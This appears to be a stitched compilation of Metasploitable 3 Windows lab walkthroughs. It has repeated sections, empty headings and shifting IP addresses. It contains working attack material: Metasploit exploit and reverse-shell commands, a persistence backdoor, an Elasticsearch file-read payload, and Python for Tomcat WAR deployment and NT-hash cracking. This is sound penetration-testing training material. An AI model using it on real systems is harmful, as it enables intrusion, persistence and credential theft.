Metasploitable 3 Windows Walkthrough [2026]

Metasploitable 3 is a purposefully vulnerable virtual machine designed by Rapid7 to help security professionals practice penetration testing. Unlike its predecessor, it features a Windows-based version (typically Windows Server 2008 R2) packed with misconfigurations and outdated software.

This walkthrough outlines the standard methodology for compromising the Windows instance of Metasploitable 3, moving from initial scanning to full system access.

1. Information Gathering & Enumeration

The first step is identifying the target and discovering its open ports and services.

Network Scanning: find the target on your network, then fingerprint its services and operating system: nmap -sV -O <target IP>

Service Analysis: Metasploitable 3 Windows typically hosts several high-value targets:

Port 80/443 (HTTP/HTTPS): Web servers (IIS, Apache).
Port 445 (SMB): File sharing.
Port 3306 (MySQL): Database access.
Port 161 (SNMP): System information.
Port 5985 (WinRM): Windows Remote Management.

2. Exploiting Web Services (The HTTP Entry Point)

A common entry vector is one of the web applications running on the machine, such as ManageEngine Desktop Central.

Vulnerability: the bundled ManageEngine build has a known RCE (Remote Code Execution) vulnerability.

The Exploit: open Metasploit with msfconsole, search for the module with search manageengine_connectionid_write, select it, and configure it with set RHOSTS <target IP> before running it.

Result: you gain a Meterpreter shell, allowing you to run commands directly on the target.

3. Exploiting SMB (EternalBlue)

Since the Windows version is often an unpatched Server 2008 R2, it is frequently susceptible to the famous EternalBlue (MS17-010) exploit.

Check: run auxiliary/scanner/smb/smb_ms17_010 first to confirm the target is vulnerable.

Exploit: use exploit/windows/smb/ms17_010_eternalblue, set your payload (e.g., windows/x64/meterpreter/reverse_tcp), LHOST (your IP) and RHOSTS (target IP), then run exploit.

Result: immediate SYSTEM-level access, which is the highest privilege on a Windows machine.

4. Post-Exploitation & Privilege Escalation

If your initial exploit only granted low-privileged user access, you must escalate your privileges.

Local Enumeration: run getuid in Meterpreter to check which account you are running as.

Suggested Exploits: use the Metasploit multi/recon/local_exploit_suggester module to find missing patches that can be exploited for elevation.

Credential Dumping: once you have SYSTEM access, use the hashdump command in Meterpreter to grab password hashes for cracking with John the Ripper or Hashcat.

5. Flag Hunting

Metasploitable 3 is designed as a "Capture the Flag" (CTF) environment. Keep an eye out for:

Hidden Files: search for files hidden in user directories (Desktop, Documents).
Registry Keys: some flags are hidden within Windows Registry values.
Database Entries: check MySQL tables for hidden strings or admin credentials.

Security Reminder

Metasploitable 3 is an intentionally insecure environment. Never deploy this VM on a public-facing network or any network you do not have permission to test. Always use a "Host-Only" or "NAT" network configuration in your virtualization software (VirtualBox/VMware).

Introduction

Metasploitable 3 is a vulnerable virtual machine designed for penetration testing and security training. The build covered here is the Windows-based one, intentionally made vulnerable to a range of attacks so that security professionals can practice their skills in a safe and controlled environment. In this walkthrough, we will explore the steps to compromise Metasploitable 3 Windows and gain access to the system.

Initial Reconnaissance

The first step in any penetration test is to gather information about the target system. In this case, we can start by scanning the network to identify the IP address of Metasploitable 3 Windows. Using a tool like Nmap, we can perform a simple scan to identify the open ports and services running on the system.

nmap -sV <IP address of Metasploitable 3 Windows>

The scan results reveal that the system has several open ports, including 135 (RPC), 139 (SMB), and 445 (SMB). This information can be used to identify potential vulnerabilities and plan the next steps.
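Reading nmap output by eye is fine for one host, but the triage the walkthrough describes (which open ports map to which high-value service, and which Metasploit check to run before exploiting) is easy to script. The following Python is an added example, not code from this walkthrough or from Rapid7: it parses nmap's XML output (what nmap -oX - produces), flags the ports this page treats as high-value, and writes a Metasploit resource script that runs only non-destructive check modules. The XML below is a constructed sample, not a real scan, and the port-to-module table is this example's own choice; every module it names is a standard Metasploit auxiliary scanner.

```python
"""Turn nmap XML into a port triage and a Metasploit resource script of check modules."""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX - <target>` output (not a real capture).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.56.103" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="Microsoft ftpd"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="8020"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="8282"><state state="open"/><service name="http" product="Apache Tomcat/Coyote JSP engine"/></port>
      <port protocol="tcp" portid="9200"><state state="open"/><service name="http" product="Elasticsearch REST API" version="1.1.1"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Port -> (label, non-destructive Metasploit check module to run first).
# None means "no check module used here; enumerate by hand". This mapping is the
# example's own choice, not a table from the walkthrough.
HIGH_VALUE_PORTS = {
    21:   ("FTP",             "auxiliary/scanner/ftp/anonymous"),
    80:   ("HTTP (IIS)",      "auxiliary/scanner/http/http_version"),
    445:  ("SMB",             "auxiliary/scanner/smb/smb_ms17_010"),
    3306: ("MySQL",           "auxiliary/scanner/mysql/mysql_version"),
    3389: ("RDP",             "auxiliary/scanner/rdp/cve_2019_0708_bluekeep"),
    4848: ("GlassFish admin", "auxiliary/scanner/http/glassfish_login"),
    5985: ("WinRM",           "auxiliary/scanner/winrm/winrm_auth_methods"),
    8020: ("ManageEngine",    None),
    8282: ("Tomcat manager",  "auxiliary/scanner/http/tomcat_mgr_login"),
    9200: ("Elasticsearch",   "auxiliary/scanner/elasticsearch/indices_enum"),
}


def parse_open_ports(xml_text):
    """Return {port: (service, product, version)} for every TCP port nmap marked open."""
    root = ET.fromstring(xml_text)
    found = {}
    for port in root.iter("port"):
        state = port.find("state")
        if port.get("protocol") != "tcp" or state is None or state.get("state") != "open":
            continue
        svc = port.find("service")
        info = ("", "", "") if svc is None else (
            svc.get("name", ""), svc.get("product", ""), svc.get("version", ""))
        found[int(port.get("portid"))] = info
    return found


def target_address(xml_text):
    """First IPv4 address in the scan, or None."""
    addr = ET.fromstring(xml_text).find("./host/address[@addrtype='ipv4']")
    return None if addr is None else addr.get("addr")


def triage(open_ports):
    """Split open ports into (high-value {port: label}, [other ports])."""
    hits, other = {}, []
    for port in sorted(open_ports):
        if port in HIGH_VALUE_PORTS:
            hits[port] = HIGH_VALUE_PORTS[port][0]
        else:
            other.append(port)
    return hits, other


def msf_check_script(open_ports, rhost, threads=4):
    """msfconsole resource script (run with `msfconsole -r checks.rc`) that executes
    the check module for every open high-value port, then exits."""
    lines = [f"setg RHOSTS {rhost}", f"setg THREADS {threads}"]
    for port in sorted(open_ports):
        module = HIGH_VALUE_PORTS.get(port, (None, None))[1]
        if module is None:
            continue
        lines += [f"use {module}", f"set RPORT {port}", "run"]
    lines.append("exit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    ports = parse_open_ports(SAMPLE_NMAP_XML)
    hits, other = triage(ports)
    for port, label in hits.items():
        print(f"{port:>5}  {label:<16} {' '.join(filter(None, ports[port]))}")
    if other:
        print("other open ports:", other)
    with open("checks.rc", "w") as fh:
        fh.write(msf_check_script(ports, target_address(SAMPLE_NMAP_XML)))
```

Replace SAMPLE_NMAP_XML with the contents of a real nmap -sV -oX scan.xml to use it against the lab VM; the generated checks.rc only runs scanners, so the decision to fire ms17_010_eternalblue (or any other exploit) stays with you after reading their output.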

Identifying Vulnerabilities

Using the information gathered during the reconnaissance phase, we can now identify potential vulnerabilities in the system. One notable vulnerability is the SMB service, which is running on port 445. Metasploitable 3 Windows has a known vulnerability in the SMB service that can be exploited using the EternalBlue exploit.

Exploiting the Vulnerability

To exploit the EternalBlue vulnerability, we can use the Metasploit framework. First, we need to start the Metasploit console and search for the EternalBlue exploit.

msfconsole
search eternalblue

This will reveal the exploit/windows/smb/ms17_010_eternalblue module, which can be used to exploit the vulnerability. We can now use the following commands to configure and launch the exploit:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP address of Metasploitable 3 Windows>
set LHOST <IP address of our machine>
exploit

Gaining Access

Once the exploit is launched, Metasploit will establish a session on the target system. We can now use the sessions command to list the active sessions and interact with the compromised system.

sessions

This will reveal a list of active sessions, including the one we just established. We can now use the sessions -i command to interact with the compromised system.

sessions -i <session ID>

Post-Exploitation

Once we have access to the system, we can perform various post-exploitation activities, such as:

Using the meterpreter shell, we can use commands like hashdump to dump the password hashes, or shell to access the system shell.

Conclusion

In this walkthrough, we have demonstrated how to compromise Metasploitable 3 Windows using the EternalBlue exploit. This exercise highlights the importance of keeping systems up-to-date with the latest security patches and demonstrates the potential consequences of neglecting security updates. By following these steps, security professionals can practice their skills in a safe and controlled environment, helping to improve their expertise and prepare for real-world penetration testing scenarios.

Additional Recommendations

By following these best practices, organizations can reduce the risk of compromise and protect their systems from potential attacks.

Mastering Metasploitable 3: A Windows Exploitation Walkthrough

Metasploitable 3 is an intentionally vulnerable virtual machine designed for security professionals to sharpen their penetration testing skills. Unlike its predecessors, the Windows version offers a modern playground of misconfigurations and unpatched services. This walkthrough focuses on the Windows Server 2008 R2 version.

1. Reconnaissance and Scanning

Every successful exploit begins with information gathering. Using Nmap, we identify open ports and services running on the target. Command: nmap -sV -sC -Pn <target IP>

Key Findings: You will likely see open ports for HTTP (80, 8282), SMB (445), MySQL (3306), and ManageEngine (8020). Each of these represents a potential entry point.

2. Exploiting Web Services: ManageEngine

One of the most reliable entry points on Metasploitable 3 is the ManageEngine Desktop Central 9 instance running on port 8020. It is vulnerable to a File Upload RCE (Remote Code Execution). Tool: Metasploit Framework

Module: exploit/windows/http/manageengine_connectionid_write. Action: set RHOSTS to the target IP (and RPORT to 8020), set PAYLOAD to windows/meterpreter/reverse_tcp, then run exploit to gain a Meterpreter shell.

3. Exploiting SMB: EternalBlue (MS17-010)

Depending on the build, the Metasploitable 3 image may already be patched against EternalBlue, but it remains a classic test case for checking legacy system security.

Check: Use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to see if the target is vulnerable.

Execution: If vulnerable, the exploit/windows/smb/ms17_010_eternalblue module can provide immediate SYSTEM level access, bypassing the need for further privilege escalation.

4. Privilege Escalation: From User to System

If you gained access as a low-privileged user (e.g., through the web server), you need to escalate your rights.

Technique: Use the multi/recon/local_exploit_suggester in Metasploit.

Common Vector: The AlwaysInstallElevated policy is often enabled on this VM. It is only exploitable when the AlwaysInstallElevated value is 1 under both HKLM and HKCU at SOFTWARE\Policies\Microsoft\Windows\Installer; with both set, any .msi package installed by a standard user runs with SYSTEM privileges, so you can generate a malicious .msi (for example with msfvenom) and install it with msiexec, or let Metasploit's exploit/windows/local/always_install_elevated module do both steps.

5. Post-Exploitation: Database Access

Once inside, you can pivot to explore the databases. The MySQL service on port 3306 often contains sensitive credentials.

Access: Use mysql -h <target IP> -u root (often there is no password by default).

Goal: Dump the users table from the web application database to find administrative credentials for other services on the network.


Summary

Metasploitable 3 provides a fantastic playground for learning the kill chain. In this walkthrough, we covered:

  1. Enumeration: Identifying Tomcat, FTP, and SMB.
  2. Exploitation: Using default Tomcat credentials to upload a payload.
  3. Escalation: Using local exploit suggesters to gain SYSTEM privileges.
  4. Post-Exploitation: Dumping password hashes.

Lessons Learned:

Disclaimer: This walkthrough is for educational purposes only. Only perform these actions on systems you own or have explicit permission to test.

This paper provides a technical walkthrough for exploiting Metasploitable 3 (Windows), a VM purposefully designed with known vulnerabilities for security testing. This guide focuses on the enumeration and exploitation of common services to achieve a Meterpreter shell.

Exploitation of Metasploitable 3 (Windows Edition)

1. Information Gathering & Enumeration

The first step in any penetration test is identifying open ports and services. Using Nmap, we scan the target IP to find potential entry points: nmap -sV -sC -Pn <target IP>

Key Findings:

Port 80/443: Web services (IIS).
Port 445: SMB (Microsoft-DS).
Port 3306: MySQL database.
Port 4848/8080: GlassFish Server (admin console and HTTP listener).
Port 16170: Management agents (often vulnerable).

2. Exploiting the GlassFish Server (Port 8080)

The GlassFish Administration Console is often left with default credentials or unauthenticated access in lab environments.

Vulnerability: the management console allows the deployment of WAR (Web Application Archive) files, so anyone who can reach it with working credentials can deploy a JSP payload.

Exploit: use Metasploit's exploit/multi/http/glassfish_deployer module with set RHOSTS <target IP>, set RPORT 4848 (the admin port) and set PAYLOAD java/meterpreter/reverse_tcp, then run exploit.

Result: a Meterpreter session as the user running the GlassFish service.

3. Exploiting ManageEngine Desktop Central (Port 8020)

Metasploitable 3 includes an outdated ManageEngine Desktop Central 9 whose FileUploadServlet does not validate the user-controlled ConnectionId parameter (CVE-2015-8249), giving an unauthenticated attacker an arbitrary file upload that becomes remote code execution.

Module: exploit/windows/http/manageengine_connectionid_write
Payload: windows/meterpreter/reverse_tcp

Mechanism: the exploit uploads a JSP payload through the ConnectionId parameter of the FileUploadServlet, placing it under a directory where server-side scripts are executed.

Result: SYSTEM-level access, since the Desktop Central service runs as SYSTEM by default; if the service has been reconfigured to run as a lower-privileged account you get a standard user shell requiring further escalation.

4. SMB Exploitation & EternalBlue (Port 445)

Depending on the specific build version of the Metasploitable 3 image, it may be vulnerable to MS17-010 (EternalBlue).

Check: use auxiliary/scanner/smb/smb_ms17_010
Exploit: use exploit/windows/smb/ms17_010_eternalblue

Mechanism: the exploit targets a buffer overflow in the SMBv1 kernel driver (srv.sys) to execute code in the kernel.

Result: immediate NT AUTHORITY\SYSTEM access.

5. Post-Exploitation & Privilege Escalation

If you gain a low-privileged shell (e.g., via the web server), you must escalate privileges.

Local Enumeration: run whoami /priv to check for enabled tokens such as SeImpersonatePrivilege.

JuicyPotato: if SeImpersonatePrivilege is available, the JuicyPotato tool can be used to escalate to SYSTEM.

Credential Dumping: once SYSTEM, load the kiwi (Mimikatz) extension in Meterpreter with load kiwi and run creds_all to dump cleartext passwords from memory.

Conclusion

Metasploitable 3 Windows serves as an excellent environment for practicing the "chaining" of vulnerabilities. While automated tools like Metasploit make the initial access easy, the real value lies in manually enumerating the underlying service configurations to understand why the exploit worked.

This walkthrough for the Windows version of Metasploitable 3 (typically Windows Server 2008 R2) covers setup, reconnaissance, and common exploitation paths.

1. Setup and Installation

Metasploitable 3 is built using Vagrant and VirtualBox.

Requirements: Install Vagrant and VirtualBox on your host machine.

Deployment:

Create a project folder: mkdir metasploitable3-workspace && cd metasploitable3-workspace. Download the Vagrantfile from the Rapid7 GitHub.

Run vagrant up win2k8 to build and start the Windows VM (this may take 30–60 minutes). Credentials: Default login is vagrant / vagrant.

Networking: Ensure the VM is set to Host-Only or NAT Network to keep it isolated from the internet.

2. Reconnaissance (Information Gathering)

Start by identifying the target IP and open ports from your attack machine (e.g., Kali Linux).

Identify IP: Run ipconfig on the target Windows VM to find its address.

Nmap Scan: Run a comprehensive scan of all TCP ports to find vulnerable services: nmap -sV -sC -p- <target IP>

Key Ports to Watch:

Port 21 (FTP): Often contains weak credentials.
Port 80 (HTTP) and the other web ports: Host vulnerable web applications like ManageEngine (8020) or Jenkins.
Port 445 (SMB): Susceptible to EternalBlue (MS17-010).
Port 3389 (RDP): Potential for BlueKeep or credential brute-forcing.
Port 9200 (Elasticsearch): Known Remote Code Execution (RCE) vulnerabilities.

3. Exploitation Walkthroughs

Path A: SMB EternalBlue (Port 445)

This is a critical RCE vulnerability in the SMBv1 protocol. Search: In msfconsole, use search ms17_010_eternalblue. Select: use exploit/windows/smb/ms17_010_eternalblue. Configure: Set RHOSTS to the target IP and LHOST to your own.

Run: Execute exploit to gain a SYSTEM-level Meterpreter shell.

Path B: Elasticsearch RCE (Port 9200)

Elasticsearch 1.1.1 on this machine allows unauthenticated dynamic script execution (CVE-2014-3120): the MVEL scripting engine is enabled by default and any search request may carry a script. Search: search elasticsearch in msfconsole.

Select: use exploit/multi/elasticsearch/script_mvel_rce (the search_groovy_script module targets the later Groovy sandbox bypass in the 1.3.x/1.4.x series and does not apply to 1.1.1). Configure: Set RHOSTS and your LHOST (Kali IP). Run: Gain access as the user running the service.

Path C: FTP Brute Force & Web Shell (Port 21/80)

Brute Force: Use auxiliary/scanner/ftp/ftp_login with common wordlists to find credentials.

Upload: Log in via FTP and upload a web shell (ASPX for IIS) into the web root served on port 80 (C:\inetpub\wwwroot on a default IIS install).

Execute: Navigate to the uploaded file via a browser to trigger your reverse shell.

4. Post-Exploitation

Once you have a shell (Meterpreter):

SysInfo: Run sysinfo to confirm target details.

Hashdump: Use hashdump to extract local user password hashes for offline cracking .

Persistence: Use the persistence module to maintain access after a reboot (the legacy run persistence Meterpreter script, or exploit/windows/local/persistence on current Metasploit releases).
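The hashdump step above hands you pwdump-format lines (user:rid:lmhash:nthash:::), and the first question is which accounts are worth the cracking time. The following Python is an added example, not code from this walkthrough, Rapid7 or the hashcat project: it parses that format, flags accounts with an empty password or a legacy LM hash, writes the hashcat -m 1000 input, and runs the same dictionary check John and hashcat perform at scale. Because NT hashes are MD4 over the UTF-16LE password and hashlib.new('md4') is absent on OpenSSL 3 builds, MD4 is implemented inline. The dump is a constructed sample built from the page's vagrant default credential plus a made-up service account, not a real capture.

```python
"""Parse Meterpreter hashdump output and run a small offline dictionary check on it."""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """RFC 1320 MD4 (pure Python; hashlib may lack md4 on OpenSSL 3)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i, s in zip(range(16), [3, 7, 11, 19] * 4):                  # round 1: F
            a, b, c, d = d, _lrot((a + ((b & c) | (~b & d)) + x[i]) & 0xFFFFFFFF, s), b, c
        for i, s in zip([0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                        [3, 5, 9, 13] * 4):                              # round 2: G
            a, b, c, d = d, _lrot((a + ((b & c) | (b & d) | (c & d)) + x[i]
                                   + 0x5A827999) & 0xFFFFFFFF, s), b, c
        for i, s in zip([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                        [3, 9, 11, 15] * 4):                             # round 3: H
            a, b, c, d = d, _lrot((a + (b ^ c ^ d) + x[i] + 0x6ED9EBA1) & 0xFFFFFFFF, s), b, c
        a, b = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF
        c, d = (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """Windows NT hash: MD4 of the UTF-16LE encoded password, as hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text):
    """hashdump prints pwdump format: user:rid:lmhash:nthash:::"""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        entries.append({
            "user": user, "rid": rid, "lm": lm, "nt": nt,
            "empty_password": nt == EMPTY_NT,   # account logs in with no password at all
            "lm_stored": lm != EMPTY_LM,        # legacy LM hash present: far weaker to crack
        })
    return entries


def hashcat_lines(entries):
    """One 'user:nthash' per line for: hashcat -m 1000 --username hashes.txt wordlist"""
    return [f"{e['user']}:{e['nt']}" for e in entries if not e["empty_password"]]


def crack(entries, wordlist):
    """Offline dictionary attack: hash each candidate once, look every account up."""
    table = {nt_hash(w): w for w in wordlist}
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


# Constructed sample (not a real dump): the box's vagrant/vagrant and Administrator/vagrant
# accounts, a Guest with no password, and a made-up service account with a strong password.
SAMPLE_HASHDUMP = f"""
Administrator:500:{EMPTY_LM}:{nt_hash('vagrant')}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
vagrant:1000:{EMPTY_LM}:{nt_hash('vagrant')}:::
svc_backup:1001:{EMPTY_LM}:{nt_hash('correct horse battery staple')}:::
"""

if __name__ == "__main__":
    found = parse_hashdump(SAMPLE_HASHDUMP)
    for e in found:
        flags = [k for k in ("empty_password", "lm_stored") if e[k]]
        print(f"{e['user']:<14} rid={e['rid']:<5} {' '.join(flags)}")
    print("\n".join(hashcat_lines(found)))
    print(crack(found, ["password", "vagrant", "Password1"]))
```

Pipe real hashdump output into parse_hashdump() and feed hashcat_lines() to hashcat; the crack() function is only there to make the mechanism visible, since a real wordlist run belongs in hashcat or John.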

🛡️ Penetration Testing Report: Metasploitable 3 (Windows)

1. Executive Summary

This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies.

Target Details: Operating System: Windows Server 2008 R2 (Metasploitable 3). IP Address: 192.168.1.36 (Example IP). Testing Machine: Kali Linux.

2. Methodology & Phases

The engagement followed the standard penetration testing execution standard:

Reconnaissance & Scanning: Discovering live hosts and open ports.
Vulnerability Analysis: Identifying outdated software and weak configurations.
Exploitation: Gaining initial access to the system.
Privilege Escalation: Elevating standard user access to administrative rights.

3. Detailed Walkthrough

🔍 Phase 1: Scanning & Enumeration

The initial step involved identifying exposed attack surfaces using Nmap: nmap -sV -sC -A 192.168.1.36

Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)

Metasploitable 3 (Windows), typically built on Windows Server 2008 R2, is designed with numerous misconfigurations and unpatched services for security testing . The standard login for this VM is vagrant / vagrant . Key Attack Vectors & Vulnerabilities



B. Tomcat Manager Weak Credentials (port 8282)

The Tomcat manager application accepts any WAR you upload once you know its credentials; on this VM the instance listens on 8282 (the port the scan phase lists alongside 80), not Tomcat's usual 8080.

msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8282
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set PAYLOAD java/meterpreter/reverse_tcp
msf6 > exploit
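The GlassFish deployer earlier on this page and the Tomcat manager upload just above both work the same way: an authenticated PUT or form upload of a WAR archive to an administrative interface, after which the container runs whatever JSP the archive holds, under the service account. The following Python is an added example (not part of the original write-up, of Metasploit or of Tomcat) that builds such a WAR in memory and prepares the Tomcat manager text-API request for it. The JSP only reports the account, OS and working directory the container runs as, which is the first thing to learn before choosing an escalation path; the host, port and credentials in the usage line are the placeholders from the block above, and the context name "whoami" is this example's own.

```python
"""Build a minimal WAR in memory and deploy it through the Tomcat manager text API."""
import base64
import io
import urllib.request
import zipfile

# The JSP reports who the servlet container runs as; it is the "payload" of this WAR.
WHOAMI_JSP = """<%@ page import="java.io.File" %>
user=<%= System.getProperty("user.name") %>
os=<%= System.getProperty("os.name") %>
cwd=<%= new File(".").getAbsolutePath() %>
"""

WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>{page}</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(page_name, jsp_source):
    """Return WAR bytes: a zip holding WEB-INF/web.xml plus the JSP at the archive root."""
    if not page_name.endswith(".jsp"):
        raise ValueError("page must be a .jsp file")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(page=page_name))
        war.writestr(page_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted member names, to confirm the archive layout before uploading it."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def welcome_file(war_bytes):
    """The welcome-file declared in WEB-INF/web.xml (what / of the context will serve)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        xml = war.read("WEB-INF/web.xml").decode()
    start = xml.index("<welcome-file>") + len("<welcome-file>")
    return xml[start:xml.index("</welcome-file>")]


def deploy_request(host, port, context, username, password, war_bytes):
    """Tomcat manager text API: PUT the WAR body to /manager/text/deploy?path=/<context>.
    The request is returned unsent so it can be inspected offline."""
    url = f"http://{host}:{port}/manager/text/deploy?path=/{context}&update=true"
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    req.add_header("Authorization", f"Basic {token}")   # manager-script role required
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy_to_tomcat(host, port, context, username, password, war_bytes):
    """Send the request; Tomcat answers 'OK - Deployed application at context path /<context>'."""
    req = deploy_request(host, port, context, username, password, war_bytes)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    war = build_war("whoami.jsp", WHOAMI_JSP)
    print(war_entries(war), len(war), "bytes")
    # Against the lab target with the placeholders from the msf6 block above:
    # print(deploy_to_tomcat("192.168.1.100", 8282, "whoami", "tomcat", "tomcat", war))
    # then browse http://192.168.1.100:8282/whoami/
```

The same WAR can be handed to the GlassFish admin console's deploy page; what differs between the two paths is only the upload endpoint and credentials, which is why both Metasploit modules take a username/password pair and a Java payload.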

6. Defensive Notes (for Blue Team)


Attack 3: WinRM with CrackMapExec

If you have valid local credentials (Metasploitable 3 ships with vagrant/vagrant and Administrator/vagrant), WinRM on port 5985 gives you command execution without any exploit:

crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"

Or use evil-winrm for an interactive shell:

evil-winrm -i 192.168.56.103 -u administrator -p vagrant

3. Persistent Access

To ensure you can come back later, install a backdoor (only in a lab environment!). The legacy Meterpreter persistence script below re-launches the payload at every user logon (-U), retrying every 10 seconds (-i 10) against your listener on port 4444:

run persistence -U -i 10 -p 4444 -r <Your_IP>

3.3 Elasticsearch (Port 9200) – Arbitrary File Read

The same dynamic-scripting weakness behind the RCE module also reads files: the script runs inside the Elasticsearch JVM as the service account, and script_fields returns its value once per matching document, so at least one document must exist in some index for anything to come back.

# Read the first line of a Windows config file via a script_fields entry
curl -XGET 'http://192.168.56.105:9200/_search?pretty' -H 'Content-Type: application/json' -d '{
  "script_fields": {
    "test": {
      "script": "java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(new java.io.FileInputStream(\"c:/windows/win.ini\"))); br.readLine();"
    }
  }
}'

The first line of win.ini appears in every hit under fields.test.